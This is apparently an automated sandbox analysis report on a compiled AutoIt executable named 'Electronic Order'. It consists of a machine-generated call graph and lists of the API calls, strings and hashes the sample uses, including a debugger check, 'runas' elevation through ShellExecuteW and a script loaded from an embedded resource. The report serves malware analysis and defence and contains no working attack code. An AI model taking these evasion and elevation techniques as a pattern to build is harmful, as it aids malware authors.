99321->99428 99324 e04856 99322->99324 99328 dcf790 99324->99328 99430 e2a0b5 89 API calls 4 library calls 99324->99430 99326 dcf65d 99326->99324 99326->99327 99326->99328 99331 e23e73 3 API calls 99327->99331 99334 e3474d 331 API calls 99327->99334 99342 dc4faa 99327->99342 99348 e2cde5 99327->99348 99328->99286 99330 dcf743 99330->99328 99429 dc9df0 59 API calls Mailbox 99330->99429 99331->99330 99334->99330 99335->99269 99336->99275 99337->99286 99338->99284 99339->99287 99340->99291 99341->99286 99343 dc4fbb 99342->99343 99344 dc4fb4 99342->99344 99346 dc4fca 99343->99346 99347 dc4fdb FreeLibrary 99343->99347 99431 de55d6 99344->99431 99346->99330 99347->99346 99349 dc77c7 59 API calls 99348->99349 99350 e2ce1a 99349->99350 99351 dc77c7 59 API calls 99350->99351 99352 e2ce23 99351->99352 99353 e2ce37 99352->99353 99838 dc9c9c 59 API calls 99352->99838 99355 dc9997 84 API calls 99353->99355 99356 e2ce54 99355->99356 99357 e2ce76 99356->99357 99358 e2cf55 99356->99358 99365 e2cf85 Mailbox 99356->99365 99360 dc9997 84 API calls 99357->99360 99705 dc4f3d 99358->99705 99361 e2ce82 99360->99361 99363 dc81a7 59 API calls 99361->99363 99366 e2ce8e 99363->99366 99364 e2cf81 99364->99365 99368 dc77c7 59 API calls 99364->99368 99365->99330 99371 e2cea2 99366->99371 99372 e2ced4 99366->99372 99367 dc4f3d 136 API calls 99367->99364 99369 e2cfb6 99368->99369 99370 dc77c7 59 API calls 99369->99370 99373 e2cfbf 99370->99373 99375 dc81a7 59 API calls 99371->99375 99376 dc9997 84 API calls 99372->99376 99374 dc77c7 59 API calls 99373->99374 99377 e2cfc8 99374->99377 99378 e2ceb2 99375->99378 99379 e2cee1 99376->99379 99381 dc77c7 59 API calls 99377->99381 99382 dc7e0b 59 API calls 99378->99382 99380 dc81a7 59 API calls 99379->99380 99383 e2ceed 99380->99383 99384 e2cfd1 99381->99384 99385 e2cebc 99382->99385 99839 e24cd3 GetFileAttributesW 99383->99839 99387 dc9997 84 API calls 99384->99387 99388 dc9997 84 API calls 99385->99388 99390 e2cfde 99387->99390 99391 e2cec8 
99388->99391 99389 e2cef6 99392 e2cf09 99389->99392 99395 dc7b52 59 API calls 99389->99395 99393 dc46f9 59 API calls 99390->99393 99394 dc7c8e 59 API calls 99391->99394 99397 dc9997 84 API calls 99392->99397 99403 e2cf0f 99392->99403 99396 e2cff9 99393->99396 99394->99372 99395->99392 99398 dc7b52 59 API calls 99396->99398 99399 e2cf36 99397->99399 99400 e2d008 99398->99400 99840 e23a2b 75 API calls Mailbox 99399->99840 99402 e2d03c 99400->99402 99405 dc7b52 59 API calls 99400->99405 99404 dc81a7 59 API calls 99402->99404 99403->99365 99406 e2d04a 99404->99406 99407 e2d019 99405->99407 99408 dc7c8e 59 API calls 99406->99408 99407->99402 99410 dc7d2c 59 API calls 99407->99410 99409 e2d058 99408->99409 99411 dc7c8e 59 API calls 99409->99411 99412 e2d02e 99410->99412 99414 e2d066 99411->99414 99413 dc7d2c 59 API calls 99412->99413 99413->99402 99415 dc7c8e 59 API calls 99414->99415 99416 e2d074 99415->99416 99417 dc9997 84 API calls 99416->99417 99418 e2d080 99417->99418 99729 e242ad 99418->99729 99420 e2d091 99421 e23e73 3 API calls 99420->99421 99422 e2d09b 99421->99422 99423 e2d0cc 99422->99423 99424 dc9997 84 API calls 99422->99424 99427 dc4faa 84 API calls 99423->99427 99425 e2d0b9 99424->99425 99427->99365 99428->99326 99429->99330 99430->99328 99432 de55e2 _wprintf 99431->99432 99433 de560e 99432->99433 99434 de55f6 99432->99434 99440 de5606 _wprintf 99433->99440 99444 de6e4e 99433->99444 99466 de8d68 58 API calls __getptd_noexit 99434->99466 99437 de55fb 99467 de8ff6 9 API calls __vswprintf_l 99437->99467 99440->99343 99445 de6e5e 99444->99445 99446 de6e80 EnterCriticalSection 99444->99446 99445->99446 99447 de6e66 99445->99447 99448 de5620 99446->99448 99449 de9e4b __lock 58 API calls 99447->99449 99450 de556a 99448->99450 99449->99448 99451 de558d 99450->99451 99452 de5579 99450->99452 99459 de5589 99451->99459 99469 de4c6d 99451->99469 99512 de8d68 58 API calls __getptd_noexit 99452->99512 99455 de557e 99513 de8ff6 9 API calls __vswprintf_l 99455->99513 
99468 de5645 LeaveCriticalSection LeaveCriticalSection _fseek 99459->99468 99462 de55a7 99486 df0c52 99462->99486 99464 de55ad 99464->99459 99465 de2f95 _free 58 API calls 99464->99465 99465->99459 99466->99437 99467->99440 99468->99440 99470 de4c80 99469->99470 99474 de4ca4 99469->99474 99471 de4916 __flush 58 API calls 99470->99471 99470->99474 99472 de4c9d 99471->99472 99514 dedac6 99472->99514 99475 df0dc7 99474->99475 99476 de55a1 99475->99476 99477 df0dd4 99475->99477 99479 de4916 99476->99479 99477->99476 99478 de2f95 _free 58 API calls 99477->99478 99478->99476 99480 de4935 99479->99480 99481 de4920 99479->99481 99480->99462 99660 de8d68 58 API calls __getptd_noexit 99481->99660 99483 de4925 99661 de8ff6 9 API calls __vswprintf_l 99483->99661 99485 de4930 99485->99462 99487 df0c5e _wprintf 99486->99487 99488 df0c6b 99487->99488 99489 df0c82 99487->99489 99677 de8d34 58 API calls __getptd_noexit 99488->99677 99490 df0d0d 99489->99490 99492 df0c92 99489->99492 99682 de8d34 58 API calls __getptd_noexit 99490->99682 99495 df0cba 99492->99495 99496 df0cb0 99492->99496 99494 df0c70 99678 de8d68 58 API calls __getptd_noexit 99494->99678 99500 ded446 ___lock_fhandle 59 API calls 99495->99500 99679 de8d34 58 API calls __getptd_noexit 99496->99679 99497 df0cb5 99683 de8d68 58 API calls __getptd_noexit 99497->99683 99502 df0cc0 99500->99502 99504 df0cde 99502->99504 99505 df0cd3 99502->99505 99503 df0d19 99684 de8ff6 9 API calls __vswprintf_l 99503->99684 99680 de8d68 58 API calls __getptd_noexit 99504->99680 99662 df0d2d 99505->99662 99508 df0c77 _wprintf 99508->99464 99510 df0cd9 99681 df0d05 LeaveCriticalSection __unlock_fhandle 99510->99681 99512->99455 99513->99459 99515 dedad2 _wprintf 99514->99515 99516 dedadf 99515->99516 99517 dedaf6 99515->99517 99615 de8d34 58 API calls __getptd_noexit 99516->99615 99519 dedb95 99517->99519 99521 dedb0a 99517->99521 99621 de8d34 58 API calls __getptd_noexit 99519->99621 99520 dedae4 99616 de8d68 58 API calls __getptd_noexit 
99520->99616 99524 dedb28 99521->99524 99525 dedb32 99521->99525 99617 de8d34 58 API calls __getptd_noexit 99524->99617 99542 ded446 99525->99542 99528 dedb2d 99622 de8d68 58 API calls __getptd_noexit 99528->99622 99529 dedb38 99531 dedb5e 99529->99531 99532 dedb4b 99529->99532 99618 de8d68 58 API calls __getptd_noexit 99531->99618 99551 dedbb5 99532->99551 99533 dedba1 99623 de8ff6 9 API calls __vswprintf_l 99533->99623 99537 dedaeb _wprintf 99537->99474 99538 dedb57 99620 dedb8d LeaveCriticalSection __unlock_fhandle 99538->99620 99539 dedb63 99619 de8d34 58 API calls __getptd_noexit 99539->99619 99543 ded452 _wprintf 99542->99543 99544 ded4a1 EnterCriticalSection 99543->99544 99545 de9e4b __lock 58 API calls 99543->99545 99547 ded4c7 _wprintf 99544->99547 99546 ded477 99545->99546 99548 ded48f 99546->99548 99624 dea06b InitializeCriticalSectionAndSpinCount 99546->99624 99547->99529 99625 ded4cb LeaveCriticalSection _doexit 99548->99625 99552 dedbc2 __write_nolock 99551->99552 99553 dedc20 99552->99553 99554 dedc01 99552->99554 99582 dedbf6 99552->99582 99558 dedc78 99553->99558 99559 dedc5c 99553->99559 99635 de8d34 58 API calls __getptd_noexit 99554->99635 99557 dedc06 99636 de8d68 58 API calls __getptd_noexit 99557->99636 99562 dedc91 99558->99562 99641 df1b11 60 API calls 3 library calls 99558->99641 99638 de8d34 58 API calls __getptd_noexit 99559->99638 99560 dee416 99560->99538 99626 df5ebb 99562->99626 99564 dedc0d 99637 de8ff6 9 API calls __vswprintf_l 99564->99637 99567 dedc61 99639 de8d68 58 API calls __getptd_noexit 99567->99639 99569 dedc9f 99571 dedff8 99569->99571 99642 de9bec 58 API calls 2 library calls 99569->99642 99573 dee38b WriteFile 99571->99573 99574 dee016 99571->99574 99572 dedc68 99640 de8ff6 9 API calls __vswprintf_l 99572->99640 99577 dedfeb GetLastError 99573->99577 99584 dedfb8 99573->99584 99578 dee13a 99574->99578 99587 dee02c 99574->99587 99577->99584 99588 dee145 99578->99588 99592 dee22f 99578->99592 99579 dedccb GetConsoleMode 
99579->99571 99581 dedd0a 99579->99581 99580 dee3c4 99580->99582 99647 de8d68 58 API calls __getptd_noexit 99580->99647 99581->99571 99585 dedd1a GetConsoleCP 99581->99585 99649 dec836 99582->99649 99584->99580 99584->99582 99591 dee118 99584->99591 99585->99580 99613 dedd49 99585->99613 99586 dee09b WriteFile 99586->99577 99589 dee0d8 99586->99589 99587->99580 99587->99586 99588->99580 99593 dee1aa WriteFile 99588->99593 99589->99587 99606 dee0fc 99589->99606 99590 dee3f2 99648 de8d34 58 API calls __getptd_noexit 99590->99648 99595 dee3bb 99591->99595 99596 dee123 99591->99596 99592->99580 99597 dee2a4 WideCharToMultiByte 99592->99597 99593->99577 99599 dee1f9 99593->99599 99646 de8d47 58 API calls 3 library calls 99595->99646 99644 de8d68 58 API calls __getptd_noexit 99596->99644 99597->99577 99598 dee2eb 99597->99598 99598->99584 99598->99592 99602 dee2f3 WriteFile 99598->99602 99598->99606 99599->99584 99599->99588 99599->99606 99602->99598 99605 dee346 GetLastError 99602->99605 99603 dee128 99645 de8d34 58 API calls __getptd_noexit 99603->99645 99605->99598 99606->99584 99608 df650a 60 API calls __write_nolock 99608->99613 99609 df7cae WriteConsoleW CreateFileW __putwch_nolock 99612 dede9f 99609->99612 99610 dede32 WideCharToMultiByte 99610->99584 99611 dede6d WriteFile 99610->99611 99611->99577 99611->99612 99612->99577 99612->99584 99612->99609 99612->99613 99614 dedec7 WriteFile 99612->99614 99613->99584 99613->99608 99613->99610 99613->99612 99643 de3835 58 API calls __isleadbyte_l 99613->99643 99614->99577 99614->99612 99615->99520 99616->99537 99617->99528 99618->99539 99619->99538 99620->99537 99621->99528 99622->99533 99623->99537 99624->99548 99625->99544 99627 df5ec6 99626->99627 99628 df5ed3 99626->99628 99656 de8d68 58 API calls __getptd_noexit 99627->99656 99631 df5edf 99628->99631 99657 de8d68 58 API calls __getptd_noexit 99628->99657 99630 df5ecb 99630->99569 99631->99569 99633 df5f00 99658 de8ff6 9 API calls __vswprintf_l 99633->99658 
99635->99557 99636->99564 99637->99582 99638->99567 99639->99572 99640->99582 99641->99562 99642->99579 99643->99613 99644->99603 99645->99582 99646->99582 99647->99590 99648->99582 99650 dec83e 99649->99650 99651 dec840 IsProcessorFeaturePresent 99649->99651 99650->99560 99653 df5b5a 99651->99653 99659 df5b09 5 API calls ___raise_securityfailure 99653->99659 99655 df5c3d 99655->99560 99656->99630 99657->99633 99658->99630 99659->99655 99660->99483 99661->99485 99685 ded703 99662->99685 99664 df0d91 99698 ded67d 59 API calls 2 library calls 99664->99698 99666 df0d3b 99666->99664 99668 ded703 __chsize_nolock 58 API calls 99666->99668 99676 df0d6f 99666->99676 99667 ded703 __chsize_nolock 58 API calls 99669 df0d7b FindCloseChangeNotification 99667->99669 99672 df0d66 99668->99672 99669->99664 99673 df0d87 GetLastError 99669->99673 99670 df0d99 99671 df0dbb 99670->99671 99699 de8d47 58 API calls 3 library calls 99670->99699 99671->99510 99675 ded703 __chsize_nolock 58 API calls 99672->99675 99673->99664 99675->99676 99676->99664 99676->99667 99677->99494 99678->99508 99679->99497 99680->99510 99681->99508 99682->99497 99683->99503 99684->99508 99686 ded70e 99685->99686 99687 ded723 99685->99687 99700 de8d34 58 API calls __getptd_noexit 99686->99700 99693 ded748 99687->99693 99702 de8d34 58 API calls __getptd_noexit 99687->99702 99690 ded713 99701 de8d68 58 API calls __getptd_noexit 99690->99701 99691 ded752 99703 de8d68 58 API calls __getptd_noexit 99691->99703 99693->99666 99695 ded71b 99695->99666 99696 ded75a 99704 de8ff6 9 API calls __vswprintf_l 99696->99704 99698->99670 99699->99671 99700->99690 99701->99695 99702->99691 99703->99696 99704->99695 99841 dc4d13 99705->99841 99710 dfdd0f 99713 dc4faa 84 API calls 99710->99713 99711 dc4f68 LoadLibraryExW 99851 dc4cc8 99711->99851 99715 dfdd16 99713->99715 99717 dc4cc8 3 API calls 99715->99717 99719 dfdd1e 99717->99719 99718 dc4f8f 99718->99719 99720 dc4f9b 99718->99720 99877 dc506b 99719->99877 99722 dc4faa 84 API 
calls 99720->99722 99724 dc4fa0 99722->99724 99724->99364 99724->99367 99726 dfdd45 99885 dc5027 99726->99885 99730 e242c9 99729->99730 99731 e242ce 99730->99731 99732 e242dc 99730->99732 99733 dc81a7 59 API calls 99731->99733 99734 dc77c7 59 API calls 99732->99734 99782 e242d7 Mailbox 99733->99782 99735 e242e4 99734->99735 99736 dc77c7 59 API calls 99735->99736 99737 e242ec 99736->99737 99738 dc77c7 59 API calls 99737->99738 99739 e242f7 99738->99739 99740 dc77c7 59 API calls 99739->99740 99782->99420 99838->99353 99839->99389 99840->99403 99890 dc4d61 99841->99890 99844 dc4d3a 99845 dc4d4a FreeLibrary 99844->99845 99846 dc4d53 99844->99846 99845->99846 99848 de548b 99846->99848 99847 dc4d61 2 API calls 99847->99844 99894 de54a0 99848->99894 99850 dc4f5c 99850->99710 99850->99711 100052 dc4d94 99851->100052 99854 dc4ced 99855 dc4cff FreeLibrary 99854->99855 99856 dc4d08 99854->99856 99855->99856 99858 dc4dd0 99856->99858 99857 dc4d94 2 API calls 99857->99854 99859 de0ff6 Mailbox 59 API calls 99858->99859 99860 dc4de5 99859->99860 99861 dc538e 59 API calls 99860->99861 99862 dc4df1 _memmove 99861->99862 99863 dc4e2c 99862->99863 99865 dc4ee9 99862->99865 99866 dc4f21 99862->99866 99864 dc5027 69 API calls 99863->99864 99874 dc4e35 99864->99874 100056 dc4fe9 CreateStreamOnHGlobal 99865->100056 100067 e29ba5 95 API calls 99866->100067 99869 dc506b 74 API calls 99869->99874 99871 dc4ec9 99871->99718 99872 dfdcd0 99873 dc5045 85 API calls 99872->99873 99875 dfdce4 99873->99875 99874->99869 99874->99871 99874->99872 100062 dc5045 99874->100062 99876 dc506b 74 API calls 99875->99876 99876->99871 99878 dc507d 99877->99878 99879 dfddf6 99877->99879 100085 de5812 99878->100085 99882 e29393 100265 e291e9 99882->100265 99884 e293a9 99884->99726 99886 dfddb9 99885->99886 99887 dc5036 99885->99887 100270 de5e90 99887->100270 99889 dc503e 99891 dc4d2e 99890->99891 99892 dc4d6a LoadLibraryA 99890->99892 99891->99844 99891->99847 99892->99891 99893 dc4d7b GetProcAddress 
99892->99893 99893->99891 99897 de54ac _wprintf 99894->99897 99895 de54bf 99943 de8d68 58 API calls __getptd_noexit 99895->99943 99897->99895 99899 de54f0 99897->99899 99898 de54c4 99944 de8ff6 9 API calls __vswprintf_l 99898->99944 99913 df0738 99899->99913 99902 de54f5 99903 de54fe 99902->99903 99904 de550b 99902->99904 99945 de8d68 58 API calls __getptd_noexit 99903->99945 99906 de5535 99904->99906 99907 de5515 99904->99907 99928 df0857 99906->99928 99946 de8d68 58 API calls __getptd_noexit 99907->99946 99908 de54cf _wprintf @_EH4_CallFilterFunc@8 99908->99850 99914 df0744 _wprintf 99913->99914 99915 de9e4b __lock 58 API calls 99914->99915 99926 df0752 99915->99926 99916 df07c6 99948 df084e 99916->99948 99917 df07cd 99953 de8a5d 58 API calls 2 library calls 99917->99953 99920 df07d4 99920->99916 99954 dea06b InitializeCriticalSectionAndSpinCount 99920->99954 99921 df0843 _wprintf 99921->99902 99923 de9ed3 __mtinitlocknum 58 API calls 99923->99926 99925 df07fa EnterCriticalSection 99925->99916 99926->99916 99926->99917 99926->99923 99951 de6e8d 59 API calls __lock 99926->99951 99952 de6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99926->99952 99937 df0877 __wopenfile 99928->99937 99929 df0891 99959 de8d68 58 API calls __getptd_noexit 99929->99959 99931 df0a4c 99931->99929 99934 df0aaf 99931->99934 99932 df0896 99960 de8ff6 9 API calls __vswprintf_l 99932->99960 99956 df87f1 99934->99956 99935 de5540 99947 de5562 LeaveCriticalSection LeaveCriticalSection _fseek 99935->99947 99937->99929 99937->99931 99961 de3a0b 60 API calls 2 library calls 99937->99961 99939 df0a45 99939->99931 99962 de3a0b 60 API calls 2 library calls 99939->99962 99941 df0a64 99941->99931 99963 de3a0b 60 API calls 2 library calls 99941->99963 99943->99898 99944->99908 99945->99908 99946->99908 99947->99908 99955 de9fb5 LeaveCriticalSection 99948->99955 99950 df0855 99950->99921 99951->99926 99952->99926 99953->99920 99954->99925 99955->99950 99964 df7fd5 99956->99964 99958 df880a 
99958->99935 99959->99932 99960->99935 99961->99939 99962->99941 99963->99931 99967 df7fe1 _wprintf 99964->99967 99965 df7ff7 100049 de8d68 58 API calls __getptd_noexit 99965->100049 99967->99965 99969 df802d 99967->99969 99968 df7ffc 100050 de8ff6 9 API calls __vswprintf_l 99968->100050 99975 df809e 99969->99975 99972 df8049 100051 df8072 LeaveCriticalSection __unlock_fhandle 99972->100051 99973 df8006 _wprintf 99973->99958 99976 df80be 99975->99976 99977 de471a __wsopen_nolock 58 API calls 99976->99977 99978 df80da 99977->99978 99981 df8114 99978->99981 99988 df8137 99978->99988 99998 df8211 99978->99998 99979 de9006 __invoke_watson 8 API calls 99980 df87f0 99979->99980 99982 df7fd5 __wsopen_helper 103 API calls 99980->99982 99984 de8d34 __chsize_nolock 58 API calls 99981->99984 99983 df880a 99982->99983 99983->99972 99985 df8119 99984->99985 99986 de8d68 __vswprintf_l 58 API calls 99985->99986 99987 df8126 99986->99987 99990 de8ff6 __vswprintf_l 9 API calls 99987->99990 99989 df81f5 99988->99989 99997 df81d3 99988->99997 99991 de8d34 __chsize_nolock 58 API calls 99989->99991 99992 df8130 99990->99992 99993 df81fa 99991->99993 99992->99972 99994 de8d68 __vswprintf_l 58 API calls 99993->99994 99995 df8207 99994->99995 99996 de8ff6 __vswprintf_l 9 API calls 99995->99996 99996->99998 99999 ded4d4 __alloc_osfhnd 61 API calls 99997->99999 99998->99979 100000 df82a1 99999->100000 100001 df82ce 100000->100001 100002 df82ab 100000->100002 100003 df7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100001->100003 100004 de8d34 __chsize_nolock 58 API calls 100002->100004 100013 df82f0 100003->100013 100005 df82b0 100004->100005 100007 de8d68 __vswprintf_l 58 API calls 100005->100007 100006 df836e GetFileType 100008 df83bb 100006->100008 100009 df8379 GetLastError 100006->100009 100011 df82ba 100007->100011 100021 ded76a __set_osfhnd 59 API calls 100008->100021 100012 de8d47 __dosmaperr 58 API calls 100009->100012 100010 df833c GetLastError 100014 de8d47 

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC3B7A
                                      • IsDebuggerPresent.KERNEL32 ref: 00DC3B8C
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E862F8,00E862E0,?,?), ref: 00DC3BFD
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00DD0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3C26,00E862F8,?,?,?), ref: 00DD0ACE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC3C81
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E793F0,00000010), ref: 00DFD4BC
                                      • SetCurrentDirectoryW.KERNEL32(?,00E862F8,?,?,?), ref: 00DFD4F4
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E75D40,00E862F8,?,?,?), ref: 00DFD57A
                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DFD581
                                        • Part of subcall function 00DC3A58: GetSysColorBrush.USER32(0000000F), ref: 00DC3A62
                                        • Part of subcall function 00DC3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DC3A71
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(00000063), ref: 00DC3A88
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(000000A4), ref: 00DC3A9A
                                        • Part of subcall function 00DC3A58: LoadIconW.USER32(000000A2), ref: 00DC3AAC
                                        • Part of subcall function 00DC3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC3AD2
                                        • Part of subcall function 00DC3A58: RegisterClassExW.USER32(?), ref: 00DC3B28
                                        • Part of subcall function 00DC39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC3A15
                                        • Part of subcall function 00DC39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3A36
                                        • Part of subcall function 00DC39E7: ShowWindow.USER32(00000000,?,?), ref: 00DC3A4A
                                        • Part of subcall function 00DC39E7: ShowWindow.USER32(00000000,?,?), ref: 00DC3A53
                                        • Part of subcall function 00DC43DB: _memset.LIBCMT ref: 00DC4401
                                        • Part of subcall function 00DC43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC44A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas$%
                                      • API String ID: 529118366-3343222573
                                      • Opcode ID: d64b23dc34929ce9a01daf8a4eb0d702f6e315832495bc2fbd3554dac3ad4789
                                      • Instruction ID: 46081df31e90eaf123e955ef927f44e09ce7c70acb0d6a649a1bc9272180999a
                                      • Opcode Fuzzy Hash: d64b23dc34929ce9a01daf8a4eb0d702f6e315832495bc2fbd3554dac3ad4789
                                      • Instruction Fuzzy Hash: A151F73090424AAECB11ABB5DC05FFD7B79EF45700F0481ADF459B71A2DA708A4ACB31

                                      Control-flow Graph

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00DC4B2B
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • GetCurrentProcess.KERNEL32(?,00E4FAEC,00000000,00000000,?), ref: 00DC4BF8
                                      • IsWow64Process.KERNEL32(00000000), ref: 00DC4BFF
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DC4C45
                                      • FreeLibrary.KERNEL32(00000000), ref: 00DC4C50
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00DC4C81
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00DC4C8D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: 54686099531e2041b8d1d5fc8aa3464651012265a0aed45cb58795a17b398556
                                      • Instruction ID: 7d02d4e1eab28296c1c2f2f9d4a4cbe1250538eba88ede5534285c6ff028df28
                                      • Opcode Fuzzy Hash: 54686099531e2041b8d1d5fc8aa3464651012265a0aed45cb58795a17b398556
                                      • Instruction Fuzzy Hash: FB91D93154A7C5DEC731DB7885616AAFFE6AF2A300B488D5DE0CB93A41D230E948D739

                                      Control-flow Graph

                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DC4EEE,?,?,00000000,00000000), ref: 00DC4FF9
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DC4EEE,?,?,00000000,00000000), ref: 00DC5010
                                      • LoadResource.KERNEL32(?,00000000,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F), ref: 00DFDD60
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F), ref: 00DFDD75
                                      • LockResource.KERNEL32(00DC4EEE,?,?,00DC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DC4F8F,00000000), ref: 00DFDD88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 4ee9293358816ccf34bf280081548fdea61c41b2a150b9a549819aae728ab895
                                      • Instruction ID: 5e8d9867e1ae72a0f35cc746da5f9f13f0f198080a71c8402493a8a7c859e5fb
                                      • Opcode Fuzzy Hash: 4ee9293358816ccf34bf280081548fdea61c41b2a150b9a549819aae728ab895
                                      • Instruction Fuzzy Hash: 76119A75200701AFD7218B66EC48F277BB9EBCAB12F24816CF406D6260DBA1E8459670
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                      • API String ID: 0-3952547859
                                      • Opcode ID: 67d25289e525f0ee4a5b8996c4b81067850ee62aba5b901c11c87a87366b7af2
                                      • Instruction ID: 8c27b04fa7f1f31f78ad1df62891673810b802918709dd6b04af8b3e8c6623e9
                                      • Opcode Fuzzy Hash: 67d25289e525f0ee4a5b8996c4b81067850ee62aba5b901c11c87a87366b7af2
                                      • Instruction Fuzzy Hash: C1A25CB5A04216CFCB24CF58C580FA9B7B2FF48314F28805DE956AB251D735ED86CB61
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00DFE7C1), ref: 00E246A6
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00E246B7
                                      • FindClose.KERNEL32(00000000), ref: 00E246C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
